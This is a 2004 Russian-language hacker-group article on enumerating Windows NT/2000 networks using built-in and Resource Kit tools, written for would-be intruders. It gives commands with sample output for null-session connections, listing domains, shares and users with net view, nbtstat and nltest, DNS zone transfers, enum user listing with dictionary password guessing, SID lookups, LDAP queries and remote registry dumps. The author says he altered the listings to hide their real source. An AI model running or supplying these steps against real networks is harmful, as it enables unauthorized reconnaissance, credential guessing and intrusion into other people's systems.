special

Статьи для хакера и не только

:[ LwB Security Team -- lwb57 ]:
-------------------------------------------------------------------
| 27.08.2004 | written by Gotius // lwb57 |
| e-mail: gotius[at]land[dot]ru | contact: www.lwb57.org |
-------------------------------------------------------------------
|=--- --- | Инвентаризация Windows | --- ---=|
-------------------------------------------------------------------


Эту статью я хочу посвятить многострадальным пользователям Windows.
Я не буду ещё по сто раз проговаривать страшные слова про все глюки
95/98. Не буду говорить, что после проблемы 2000 наступила проблема
ХР. Я хочу написать про 2000. Сразу скажу, что по лично моему
мнению, это с амый хороший вынь из всех, но только не как сервер.
Как рабочую платформу я, как мне уже кажется, я буду использовать
её до скончания времён. Те типа «кул-мега-хацкеры», которые мне
сейчас кричат, что нет лучше никсов. Сразу шлю в /dev/null, т.к.
никсы я признаю только для очень и очень серьёзных целей, в первую
очередь взлом/защита и т.д., но вот чтобы документ набрать, я туда
лезть не буду. Все замечания на данный счёт шлите, на уже указанный
мною адрес.

Итак, перехожу ближе к делу, а точнее к 2000/NT. Я думаю, что ни
для кого не секрет, что NT больна тем, что представляет слишком
много информации по любому запросу. Этим опасным занятием
занимаются протоколы CIFS/SMB (Common Internet File System/Server
Message Block). Эти протоколы, к сожалению, слишком важны для
сетевых служб, так что просто отказаться от них нельзя. Хотя, в
2000 вы без проблем сможете использовать TCP/IP без NetBIOS, но вот
остальные глюки всё же остались.

Сейчас я не хочу, чтобы кто то ринулся на поиски тулов, которые бы
нам все выложили. Давайте вспомним, что сама же Майкрософт делает
нашу жизнь проще, а точнее случилось же им выпустить NTRK (NT
Resource Kit). Конечно, этот продукт и есть предмет первой
необходимости для администраторов NT, но он содержит утилиты,
которые так полезны взломщику (чего стоит система удалённого
управления). Итак, пакет для 2000, славно продолжает традиции.

Сразу хочу сказать, что всё будет гораздо эффективнее, если мы, для
начала, установим «Нулевое соединение» или «Нулевой сеанс» (кому
как больше нравится). Это и есть больное место CIFS/SMB и NetBIOS.
Для этого должен быть открыт 139 порт (открывается по умолчанию),
так вот, с помощью нулевого соединения нам даёт возможность
использовать протоколы, в то время, как мы даже не аутенфицированы.
Как и в предыдущих статьях, в первую очередь я буду раскрывать
«родные средства» ОС.
Итак, чтобы открыть соединение, нам нужно набрать команду
---
net use \\123.45.78.23\IPC$ “” /u:””
---
Таким образом мы установим скрытый канал между процессами по
протоколу IPC$, в качестве анонимного пользователя (/u:””) и с
пустым паролем (“”). Если всё пройдёт успешно, то мы получим наш
Грааль, так мы сможем получить инфу не только о сети, ресурсах,
пользователях, группах, но мы сможем даже вытащить ключи реестра и
т.д. Есть и другие названия данной бреши, но…
1.Я их просто не помню (не обязан)
2.Это название понимают все, так что не бойтесь его использовать.
Для админов скажу, что от нулевых соединений можно защититься,
запретив подобные соединения в Local Sec. Policy Setting (если не
найдёте, то пишите на мыло, покажу на пальцах). А на радость
будущим хакерам скажу, что утилита sid2user, о которой я упомяну
позже, все равно работает, даже при запрещённых нулевых соединениях
(все благодарственные письма, прямо к Биллу).

Итак, сейчас я предлагаю обратить свои взоры на все прелести
NetBIOS. Я думаю, что никому не нужно объяснять, что это такое.
Повторяю ещё раз, если хотите, чтобы все было как по маслу, так
устанавливайте нулевое соединение, а потом всё остальное. И ещё, я
далее не буду приводить реальных данных и реальных IP, т.к. я могу
попасть под статью, так что всё будет немного изменено.

Так вот, чтобы получить имена доменов сети, мы воспользуемся
командой (из ком.стр. 2000/NT) прим. Это очень актуально для тех,
кто юзает локалку.
---
net view /domain мы получим что то типа этого…
Domain
----------------------------------
DOMAIN_NAME1
DOMAIN_NAME2
DOMAIN_NAME3
...

Далее мы можем посмотреть все компьютеры определённого домена
---
Net view /domain:DOMAIN_NAME2
******************************
Server Name Remark
-----------------------------------
\\TITO I’m here
\\MITO He is not
\\LITO Emm... what does it mean
\\vASYA_PUPKIN Ou! Yo!

Не секрет, что если мы пропинговали их до этого, то мы можем
использовать IP вместо Server name (например \\124.11.48.15).

В принципе, мы можем получить дамп таблицы имён с помощью команды
nbtstat, указав параметр А и указав IP. Мы получим примерно
следующее
---
C:\Documents and Settings\an>nbtstat -A 10.1.5.10

Подключение по локальной сети:
Адрес IP узла: [10.1.5.10] Код области: []

Таблица NetBIOS-имен удаленных компьютеров

Имя Тип Состояние
----------------------------------------------------
INet~Services <1C> GROUP Зарегистрирован
IS~HEXDN...... <00> UNIQUE Зарегистрирован
HEXDN <00> UNIQUE Зарегистрирован
HEXDN <03> UNIQUE Зарегистрирован
AN <03> UNIQUE Зарегистрирован
RFK <00> GROUP Зарегистрирован
RFK <1E> GROUP Зарегистрирован
HEXDN <20> UNIQUE Зарегистрирован
RFK <1D> UNIQUE Зарегистрирован
..__MSBROWSE__.<01> GROUP Зарегистрирован
ADMIN <00> UNIQUE Зарегистрирован

Адрес платы (MAC) = 00-01-20-F2-37-7C

Итак, мы здесь можем увидеть, что мы получили имя компьютера HEXDN,
который принадлежит домену RFK, а ещё имена пользователей, в нашём
случае только Админ.
Справа от Name есть коды служб NetBIOS, если говорить вкратце, то
<00> Это служба рабочей станции или Имя домена.
<03> Это служба рассылки, переданных на данный комп/пользователя
<1D> Главный броузер
<1E> служба просотра
<20> Это службы сервера
Остальное… RTFM

К сожалению, сейчас нам потребуется фишка, которая входит в NTRK,
это nltest. Так мы сможем узнать, какие контроллеры доменов
являются первичными(PDC), а какие вторичными(BDC)… для этого нам
нужно ввести nltest /dclist:domain_name2
---
List of DCs in Domain domain_name2
\\TITO (PDC)
\\MITO
\\LITO
...

Дальше самое вкусное… узнаём шары с помощью нулевого сеанса и нашей
команды net view
C:\Documents and Settings\an>net view \\TITO
Общие ресурсы на \\TITO

Сетевое имя Тип Использовать как Комментарий

--------------------------------------------------------
D Диск
Games Диск
Movies Диск
SAM80 (D) Диск
SCSI (I) Диск
Video Диск
фильмы Диск
Команда выполнена успешно.

Забегая немного вперёд скажу, что если мы получим права
привилегированного пользователя, то мы сможем воспользоваться
srvcheck, чтобы узнать не только о шарах и авторизованных юзерах,
но и о скрытых ресурсах. Кроме того, srvinfo –s… попробуйте, Вам
понравится…

Если не хочется использовать командную строку, то можно
воспользоваться утилитами Legion, Nat или DumpSec. А так же хорошая
утилита enum.

Дальше неплохо бы нам накинуться на Вин 2К.
Где то поначалу я говорил, что нам просто необходимо получить
данные, касательно DNS. Если кто не помнит, DNS служит для
преобразования такого милого имени как mail.ru в его реальный IP.
Если вернуться ближе к нашей теме, то пространство имён активного
каталога основывается на DNS, а вот в Вин 2000 DNS как раз отлично
подходит для нашей следующей задачи…
Я уже описывал эту процедуру ранее, так что сейчас я просто напомню
команду Nslookup
А потом
Server nc.dom.net
Ls –d nc.dom.net
-----------------------------------------------------
C:\Documents and Settings\an>nslookup
Server: ns.dom.net
Address: XX.X.X.X

> ls -d dom.net
[ns.dom.net]
dom.net. SOA ns.dom.net root.dom.net. (2003222838 28800 7200 604800 86400)
dom.net. NS ns.dom.net
dom.net. MX 20 dom.nex.com
dom.net. MX 30 ns.dom.net
dom.net. MX 40 gateway.dom.net
dom.net. A XX.X.XX.XX
OEM43261 TXT "31b066c632f3c44570893fb11366916a29"

OEM43261 A 10.1.5.32
cd1 A 10.1.5.14
ns A XX.X.XX.XX
ns A 10.1.5.1
ns A 192.168.0.1
mail CNAME ns.dom.net
fsbp A 10.1.5.55
user A 10.1.5.236
user TXT "31347d492f64a86fb88d301a22799a516e"

ns1 CNAME ns.dom.net
klad A 10.1.5.16
epson A 10.1.5.12
Copier TXT "313c5b23d4a74d4beb86e5e9999827232b"

www CNAME ns.dom.net
fs1 A 10.1.5.11
OEMCojhtdjt TXT "31a27188d85ff233a56e0a4d2e14713cdf"
-----------------------------------------------------
Учитывая специфику Вин 2К, запись будет иметь расшифровку…
Service.Proto.Name TTL CLASS SRV PROIRITY WEIGHT PORT TARGET

Также нам неплохо бы инвентаризировать пользователей, вот тут мы
воспользуемся enum, сливайте её из интернета
---
Enum –U –d –P –L –c 120.13.14.56
Server: 120.13.14.56
Setting up session... success
Password policy:
Min length: none

lockout threshold: none
opening lsa policy: success
names:
netbios: mycom.net
domain: mycom.net

trusted domain:
SYSOPS
PDC: CORP-DC
netlogon done by a PDC server
getting user list (pass 1, index 0)… success got 12
Administrator
Puter/domain
Attributes:
Stis attributes: ...
Guest (...)
attributes: disabled
...
...
Можно ещё упомянуть, что данная утила позволяет узнать пароль
одного пользователя за один раз, надо указать
–D –u -f <файл словаря>

В комплекте NTRK есть ещё пироги, которые нам помогут usrstat,
showgrps, local и global. А так же есть команда dumpsec
Dumpsec /computer=\\157.18.45.83 /rpt=usersonly /saveas=tsv /outfile=C:\haked\fuck.txt
Листинг очень прост, можете и сами глянуть, НО НЕ ЗАБУДТЕ ПРО
НУЛЕВОЙ СЕАНС!!!

Нам можно отиндефицировать учётные записи юзеров с помощью
user2sid/sid2user. Эти утилы дают нам получить идентификатор защиты
пользователя (SID). SID это идентификатор переменной длины, которое
даётся юзеру во время установки. Эта тема, как мне кажется
достаточно обширна, так что я её освящу только по заявкам, но
так… если решите что это вам не нужно, скажу, что с помощью этих
утил можно получить все группы и всех пользователей на удалённой
машине…

В Win 2K введена новая Приблуда LDAP (Lightweight Directory Access
Protocol). В простонародье это обзывается Активным каталогом. Там
содержится унифицированное логическое представление всех объектов
корпоративной сети. Оттуда мы можем извлечь очень много информации
о пользователях и группах… для этого есть родное средство ldp
(NTRK). К нашему счастью, если мы укажем этой утиле контролер
домена Win 2K, при этом мы уже будем знать пароль Guest (если он
есть, что вряд ли), то мы запросто проведём нашу инвентаризацию…
Эта утила имеет графический интерфейс, так что он не вызовет
трудностей. Сначала приконнектимся (Connection->Connect), порт 389
или 3268, если другой, то придётся уточнять, но в основном эти.
Дальше зарегимся (Connection->Bind), после этого выберем View->Tree
и укажем (если у нас, например, bigdc.ourfirm.org) dc=ourfirm,
dc=org. И мы получим нашу инфу, я не могу привести скриншот, так
что разбирайтесь сами, будут вопросы – пишите.

Последнее, что я опишу, это как нам получить доступ к реестру. Это
будет актуально, если админ - дебил и не запретил данную операцию,
т.к. она закрыта для нулевых соединений.
Например:
---
regdmp –m \\195.47.87.89 HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run
---------------------------------------------------------
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CurrentVersion\Run
NVCLOCK = rundll32 nvclock.dll,fnNvclock
Synchronization Manager = mobsync.exe /logon

Заключение:
-----------
К моему превеликому сожалению, я не смог написать эту статью, где
бы я смог раскрыть просто всё, что касается инвентаризации Окошек.
Скорее, у меня получилась обзорная статья по родным Окошным
средствам. В принципе, это и было моей целью, я имею в виду
описать родные средства, но, конечно, лучше бы было сделать это
глубже. Почему я не стал этого делать, в принципе, ответ прост:
Зная основы – очень легко копнуть чуть глубже. На самом деле ничего
сложного там нет, просто ключи, которые вам выдадут немного иную
информацию. Например IP вместо имён. В любом случае, если глубокая
инвентаризация минимальными затратами на пароли не так важна, то
есть много утил, которые с радостью облегчат вам жизнь. Только не
забывайте, что много информации, которую вам они предоставят,
останется за кулисами, но она бывает так, чёрт возьми, полезна!


P.S. Как же я за#бался изменять листинги так, чтобы нельзя было
понять источника, откуда они всё таки получены.


+-----------------------------------------------------------------+
| Сopyright 2002-2004 by LwB Security Team. |
+-----------------------------------------------------------------+

Дата створення/оновлення: 25.05.2018